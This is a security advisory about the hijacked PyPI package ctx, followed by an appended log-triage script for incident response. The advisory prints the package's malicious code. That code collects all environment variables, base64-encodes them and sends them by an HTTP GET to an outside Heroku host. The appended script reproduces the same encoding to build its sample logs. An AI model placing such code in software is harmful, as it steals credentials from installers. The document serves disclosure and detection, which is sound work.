Malicious Package Affecting ctx package, versions [0.1.2,]


Severity

high

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

Exploit Maturity
Mature

  • Snyk ID: SNYK-PYTHON-CTX-2847242
  • Published: 24 May 2022
  • Disclosed: 24 May 2022
  • Credit: jimtk

Introduced: 24 May 2022

Malicious. CVE: not available. CWE-506.

How to fix?

Avoid using all malicious instances of the ctx package.

Overview

ctx is a malicious package. Versions 0.2.2 and 0.2.6 were released with malicious code that sends AWS tokens to a URL, and version 0.1.2 was also republished to PyPI with the malicious code included. In addition, all other versions of the library were removed from PyPI. PyPI has since removed all versions of this library from the registry.

The ctx project hosted on PyPI was taken over via a user account compromise and replaced with a malicious project containing runtime code that collected the content of os.environ.items() when instantiating Ctx objects. The captured environment variables were sent as a base64-encoded query parameter to a Heroku application running at https://anti-theft-web.herokuapp.com.

If you installed this package between 2022-05-14T19:18:36Z and 2022-05-24T10:07:17Z and your environment variables contain sensitive data such as passwords and API keys (for example AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY), we advise that you rotate your passwords and keys, then perform an audit to determine whether they were exploited.

Update

As of May 25th a security researcher has claimed responsibility for this attack as a "demonstration" of how it is possible to take over packages in package managers. They claim that all user data collected was deleted and that no use was made of the data collected by the attack.

The active collection of this type of sensitive user data for "demonstration" purposes is still problematic, and not an act Snyk would normally associate with a responsible disclosure process.

PoC

    def __init__(self):
        self.sendRequest()
    .
    .  # code that performs dict access
    .  # please DO NOT RUN THIS CODE !

    def sendRequest(self):
        string = ""
        for _, value in environ.items():
            string += value+" "

        message_bytes = string.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_message = base64_bytes.decode('ascii')

        response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)
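As an added incident-response example (not part of the Snyk advisory or the ctx package), the following Python scans egress-proxy log lines for requests to the exfiltration endpoint described above, reverses the base64 encoding the PoC applies to the environment values, and flags AWS access key IDs that need rotation first. The proxy log format, the sample lines and the IP addresses are constructed assumptions; the AWS values are AWS's documented placeholder credentials.

```python
import base64
import binascii
import re
from datetime import datetime, timezone

EXFIL_HOST = "anti-theft-web.herokuapp.com"  # endpoint named in the advisory
EXFIL_PATH = "/hacked/"                      # path used by the PoC's requests.get
WINDOW_START = datetime(2022, 5, 14, 19, 18, 36, tzinfo=timezone.utc)  # advisory install window (UTC)
WINDOW_END = datetime(2022, 5, 24, 10, 7, 17, tzinfo=timezone.utc)

# Constructed proxy log format (an assumption): "<iso-timestamp> <client-ip> GET <url>".
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) GET https://(?P<host>[^/\s]+)(?P<path>\S*)")


def decode_payload(path: str) -> list[str]:
    """Undo the PoC's encoding: base64 of every environment value followed by a space."""
    try:
        raw = base64.b64decode(path[len(EXFIL_PATH):], validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return []
    return [v for v in raw.split(" ") if v]


def triage(lines: list[str]) -> list[dict]:
    """Return one finding per request to the exfiltration endpoint."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["host"] != EXFIL_HOST or not m["path"].startswith(EXFIL_PATH):
            continue
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        values = decode_payload(m["path"])
        findings.append({
            "src": m["src"],
            "in_window": WINDOW_START <= ts <= WINDOW_END,
            "values_leaked": len(values),
            # AWS access key IDs begin with "AKIA"; rotate these first.
            "aws_key_ids": [v for v in values if v.startswith("AKIA")],
        })
    return findings


def _poc_encode(values: list[str]) -> str:
    """Reproduce the PoC's wire format, used here only to build constructed sample data."""
    return base64.b64encode("".join(v + " " for v in values).encode("ascii")).decode("ascii")


# Constructed sample log; the AWS values are AWS's documented placeholder credentials.
SAMPLE_LOG = [
    "2022-05-15T08:01:02Z 10.0.0.7 GET https://pypi.org/simple/ctx/",
    "2022-05-15T08:01:05Z 10.0.0.7 GET https://anti-theft-web.herokuapp.com/hacked/"
    + _poc_encode(["/usr/bin:/bin", "AKIAIOSFODNN7EXAMPLE", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"]),
    "2022-06-01T00:00:00Z 10.0.0.9 GET https://anti-theft-web.herokuapp.com/hacked/not-base64!",
]
```

Run `triage(SAMPLE_LOG)` to get one finding per exfiltration request; a request inside the window with decodable values identifies hosts whose full environment must be treated as compromised.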
